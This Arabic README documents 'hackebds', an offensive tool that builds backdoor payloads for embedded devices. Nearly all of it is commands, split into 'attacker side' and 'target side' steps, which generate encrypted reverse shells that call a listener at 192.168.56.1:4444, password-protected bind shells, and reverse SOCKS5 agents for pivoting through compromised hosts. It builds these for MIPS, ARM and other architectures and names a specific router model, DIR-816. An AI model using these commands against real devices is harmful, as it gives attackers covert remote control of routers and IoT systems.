
تُستخدم هذه الأداة لتشفير الباب الخلفي، وإنشاء كود شيل وسوكس5 بروكسي، واسترجاع المعلومات، وترتيب الـ POC للأجهزة ذات البنى المختلفة.
hackebds هي مجموعة أدوات لتوليد حمولات الأجهزة المدمجة، وسير عمل الصدفات المشفرة، ونفق وكيل SOCKS5، والبحث عن معلومات الأجهزة.
يستخدم الفرع الحالي سير عمل ELF نقي للصدفة المشفرة وميزات الوكيل:
reverse_shell_file + encrypted_shell_server / reverse_shell_serverbind_shell + bind_shell_clientreverse_proxy_file + reverse_proxy_serverforward_proxy_fileencrypted_shell_server / reverse_shell_server من نوع ELF بحيث يمكن استقبال الصدفات العكسية المشفرة دون الحاجة إلى معالجات Python في زمن التشغيلbind_shell_client من نوع ELF لـ bind_shellaes و chacha20 لحركة الصدفة المشفرة/الوكيل-bind_ip للملفات الثنائية ELF الخاصة بجهة المستمع مثل bind_shell و encrypted_shell_server و reverse_proxy_server و forward_proxy_filereverse_shell_file و كحمولات صادرة: فهي تستخدم ولا تربط عنوان IP مستمع محليpython3 -m pip install -U hackebds
التثبيت المحلي للتطوير:
git clone https://github.com/doudoudedi/hackEmbedded
cd hackEmbedded
python3 -m pip install -e .
إذا أعدت بناء عجلات الإصدار على مضيف آخر، استخدم ملف zip المصدر و build_release.py.
unzip hackebds-0.4.3-source-for-x86-build.zip
cd hackebds-0.4.0.backup-20260411T142751Z
python3 -m pip install -U pip setuptools wheel cython
python3 build_release.py --plat manylinux2014_x86_64
قم بتثبيت binutils للهندسة المعمارية المستهدفة قبل إنشاء ملفات ELF غير محلية.
sudo apt install binutils-aarch64-linux-gnu
sudo apt install binutils-arm-linux-gnueabi
sudo apt install binutils-mips-linux-gnu
sudo apt install binutils-mipsel-linux-gnu
sudo apt install binutils-mips64-linux-gnuabi64
sudo apt install binutils-mips64el-linux-gnuabi64
sudo apt install binutils-powerpc-linux-gnu
sudo apt install binutils-riscv64-linux-gnu
يمكن لمستخدمي macOS استخدام pwntools binutils:
brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb
جهة المهاجم:
hackebds -arch x64 -res encrypted_shell_server \
-reverse_port 4444 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_server.elf
chmod +x reverse_server.elf
./reverse_server.elf
جهة الهدف:
hackebds -arch mipsel -res reverse_shell_file \
-reverse_ip 192.168.56.1 -reverse_port 4444 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_payload.elf
chmod +x reverse_payload.elf
./reverse_payload.elf
ملاحظات:
reverse_shell_file لا يدعم -bind_ipencrypted_shell_server يدعم -bind_ip-cipher chacha20 إلى -cipher aes لاستخدام AESجهة الهدف:
hackebds -arch aarch64 -res bind_shell \
-bind_port 5555 \
-bind_ip 192.168.56.20 \
-passwd "s3cr3t" \
-cipher chacha20 -encrypt_key "demo-key" \
-filename bind_shell.elf
chmod +x bind_shell.elf
./bind_shell.elf
جهة المهاجم:
hackebds -arch x64 -res bind_shell_client \
-reverse_ip 192.168.56.20 -reverse_port 5555 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename bind_client.elf
chmod +x bind_client.elf
./bind_client.elf
ثم أدخل:
s3cr3t
id
uname -a
exit
المستمع:
hackebds -arch x64 -res encrypted_shell_server --power \
-reverse_port 4444 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename power_server.elf
./power_server.elf
الحمولة:
hackebds -arch armelv7 -res reverse_shell_file --power -sleep 10 \
-reverse_ip 192.168.56.1 -reverse_port 4444 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename power_payload.elf
الخادم:
hackebds -arch x64 -res reverse_proxy_server \
-agent_port 7000 -socks_port 1080 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_proxy_server.elf
chmod +x reverse_proxy_server.elf
./reverse_proxy_server.elf
الوكيل العميل (Agent):
hackebds -arch mips64el -res reverse_proxy_file \
-reverse_ip 192.168.56.1 -reverse_port 7000 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_proxy_agent.elf
chmod +x reverse_proxy_agent.elf
./reverse_proxy_agent.elf
الاختبار:
curl --socks5-hostname 127.0.0.1:1080 http://example.com/
خادم مع مصادقة:
hackebds -arch x64 -res reverse_proxy_server \
-agent_port 7000 -socks_port 1080 \
-bind_ip 192.168.56.1 \
-socks_auth user:pass \
-cipher aes -encrypt_key "demo-key" \
-filename reverse_proxy_server_auth.elf
ملاحظة UDP:
sparc / sparc64 لا ينبغي التعامل معها كمدعومة UDPhackebds -arch x64 -res forward_proxy_file \
-listen_port 1081 \
-bind_ip 192.168.56.1 \
-filename forward_proxy.elf
chmod +x forward_proxy.elf
./forward_proxy.elf
الاختبار:
curl --socks5-hostname 127.0.0.1:1081 http://example.com/
hackebds -arch armelv7 -res reverse_shellcode \
-reverse_ip 192.168.56.1 -reverse_port 4444
-modelhackebds -reverse_ip 127.0.0.1 -reverse_port 9999 \
-model DIR-816 -res reverse_shell_file
--mcpuhackebds -mcpu mips32r2 -li -arch mipsel \
-reverse_ip 127.0.0.1 -reverse_port 9999 \
-res reverse_shell_file
--firmwarehackebds --firmware ./firmware.bin
-bind_ip مخصص فقط لملفات ELF الخاصة بجهة المستمعreverse_shell_file و reverse_proxy_file هما حمولات صادرة ولا تربطان عنوان IP مستمع محليreverse_proxy_server و forward_proxy_file يدعمان -bind_ipchacha20 و aes، بشرط تطابق الخوارزمية بين الجانبينreverse_proxy_file-reverse_ip